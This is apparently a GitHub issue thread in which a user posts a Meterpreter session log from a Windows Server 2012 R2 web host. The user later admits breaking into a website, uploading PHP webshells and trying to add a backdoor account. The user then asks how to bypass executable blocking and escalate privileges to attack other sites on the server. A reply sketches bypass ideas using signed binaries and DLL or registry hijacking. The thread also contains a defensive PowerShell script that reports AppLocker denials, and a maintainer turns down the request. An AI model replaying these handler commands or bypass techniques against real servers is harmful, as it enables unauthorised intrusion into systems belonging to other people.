The payload:
windows/meterpreter/reverse_tcp, using fatrat powershell.bat
My OS:
Windows 7 64-bit (the same problem on Kali 2.0 amd64 - Debian)
Metasploit version:
latest version
Victim OS:
Windows NT DTIN 6.3 build 9200 (Windows Server 2012 R2 Standard Edition) i586
meterpreter > sysinfo
Computer : DTIN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 100
=[ metasploit v4.17.84-dev ]
[*] Successfully loaded plugin: pro
msf > use exploit/multi/handler
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > set LHOST xxx.xxx.xxx.xx
LHOST => xx.xxx.xxx.xx
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > exploit
[-] Handler failed to bind to xx.xx.xxx.xx:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Sending stage (180291 bytes) to x..xx..xx.xx
[*] Meterpreter session 1 opened (x.xxx.xxx.xxx:4444 -> xxxx.xxx.xx:51984) at 2019-10-19 17:34:28 +0200
[*] Sending stage (180291 bytes) to x..xx.x.xx
[*] Meterpreter session 2 opened (x..x.xx.xxx.xx.x:4444 -> x..xx.xx.xx.:52950) at 2019-10-19 17:34:33 +0200
meterpreter > shell
Process 13692 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Inetpub\vhosts\xxxxx>start exx.exe
start exx.exe
This program is blocked by group policy. For more information, contact your system administrator.
So I can't start or execute any .exe files; that's why I used .bat.
C:\Inetpub\vhosts\xxxxxxx>net user theblackattacker password /add
net user theblackattacker password /add
System error 5 has occurred.
Access is denied.
meterpreter > execute -f exx.exe
[-] stdapi_sys_process_execute: Operation failed: 1260
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The
following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > getuid
Server username: DTIN\IWPD_137(user)
meterpreter >
Prefacing this with the assumption you own this machine or have permission to access it...
This all looks correct? You are using a user level account on a locked-down server. getsystem only modifies access; it does not bypass it. Most of the privilege escalations will try to execute a binary. In this case, it looks like some set of binaries are not approved for execution.
Without knowing how locked down the system is, or what the exx.exe does, my suggestion would be to explore using a signed binary to get execution of an unsigned binary (like rundll32.exe) or check for a hijacking opportunity in the registry or dll imports. That would also work if you could gain a privilege escalation by any of those methods, too.
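Added note and example, not part of this thread: the "This program is blocked by group policy" message and the Meterpreter error 1260 (ERROR_ACCESS_DISABLED_BY_POLICY) in the session above are what a Software Restriction Policy or AppLocker rule returns when it denies an executable. From the administrator's side, the useful follow-up is to see which files and which accounts are being denied, because every denial is logged. The PowerShell script below is an added example written for that purpose; it is not code from this thread or from Metasploit. It assumes the default AppLocker log name "Microsoft-Windows-AppLocker/EXE and DLL" with event 8004 for a block (8003 for audit-only), SRP event IDs 865/866 in the Application log, and the field names of the AppLocker event's UserData block; the hour window is a parameter you choose.

```powershell
# Added example (not from the thread): summarise executables denied by
# AppLocker or Software Restriction Policies on the local host.
# Assumptions (labelled): AppLocker writes denials as event 8004 (audit-only
# "would have blocked" as 8003) to the "Microsoft-Windows-AppLocker/EXE and DLL"
# log; SRP writes denials as events 865/866 from provider
# Microsoft-Windows-SoftwareRestrictionPolicies to the Application log.
# Run in an elevated PowerShell session on the server being reviewed.
param(
    [int]$Hours = 24   # look-back window; chosen for this example
)

$since   = (Get-Date).AddHours(-$Hours)
$results = @()

# --- AppLocker: 8004 = blocked, 8003 = audit-only ---
try {
    $al = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-AppLocker/EXE and DLL'
        Id        = 8004, 8003
        StartTime = $since
    } -ErrorAction Stop
    foreach ($e in $al) {
        # Field names assumed from the AppLocker event schema (UserData/RuleAndFileData)
        $d = ([xml]$e.ToXml()).Event.UserData.RuleAndFileData
        $results += [pscustomobject]@{
            Time   = $e.TimeCreated
            Source = if ($e.Id -eq 8004) { 'AppLocker-Blocked' } else { 'AppLocker-AuditOnly' }
            User   = $d.TargetUser      # SID of the account that tried to run the file
            File   = $d.FilePath
            Rule   = $d.RuleName
        }
    }
} catch {
    # Get-WinEvent throws when the log is absent or holds no matching events
    Write-Verbose "No AppLocker events: $($_.Exception.Message)"
}

# --- SRP: events 865/866 in the Application log ---
try {
    $srp = Get-WinEvent -FilterHashtable @{
        LogName      = 'Application'
        ProviderName = 'Microsoft-Windows-SoftwareRestrictionPolicies'
        Id           = 865, 866
        StartTime    = $since
    } -ErrorAction Stop
    foreach ($e in $srp) {
        # SRP events carry the path only inside the message text, so keep its first line
        $results += [pscustomobject]@{
            Time   = $e.TimeCreated
            Source = 'SRP-Blocked'
            User   = $e.UserId
            File   = ($e.Message -split "`n")[0].Trim()
            Rule   = "Event $($e.Id)"
        }
    }
} catch {
    Write-Verbose "No SRP events: $($_.Exception.Message)"
}

# Group by account and file. Repeated denials from a web-application identity
# (an IIS worker-process account, as in the session above) deserve a closer look,
# because a web shell running as that account is the usual source of such attempts.
$results |
    Sort-Object Time -Descending |
    Group-Object User, File |
    Select-Object @{n='Count';    e={$_.Count}},
                  @{n='User';     e={$_.Group[0].User}},
                  @{n='File';     e={$_.Group[0].File}},
                  @{n='Source';   e={$_.Group[0].Source}},
                  @{n='LastSeen'; e={$_.Group[0].Time}} |
    Format-Table -AutoSize
```

Usage: `.\blocked-exec-report.ps1 -Hours 72` (file name chosen for this example) prints one row per account/file pair with the number of denials and the most recent timestamp. A burst of denials for files under a web root such as C:\Inetpub\vhosts\... from a single site's worker-process account is the pattern to escalate: the policy is holding, but the account that is trying to run those files is already compromised.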
You're totally right. I hacked a website using server Windows 2012 R2 6.3,
then I uploaded a PHP payload, which only worked for 3 minutes,
so I made a PHP script to execute my PowerShell payload,
because using start powershell.bat doesn't work from webshell.php or webshell.aspx.
So I connected and got meterpreter. When I try to upload my shell to another site on the same server, I find I can't go anywhere, only the same site I hacked. I tried to bypass it with other shells, nothing works; exe files were working but now the admin has blocked them.
All I need is to bypass the site I use and hack other sites on the same server!
That's why I tried to use getsystem.
Can you explain more about
"hijacking opportunity in the registry or dll imports"
and
"my suggestion would be to explore using a signed binary to get execution of an unsigned binary (like rundll32.exe)"?
How can I do that? And do you have a tutorial? And don't forget exe files won't work.
Another thing:
can I inject a payload into a process using Armitage or Metasploit? What do you think?
Sorry, Github isn't the right location to ask for help on "how to hack".
I just didn't understand what he means. OK, I understand,
but the same problem: how can I bypass exe file blocking using the command shell or meterpreter?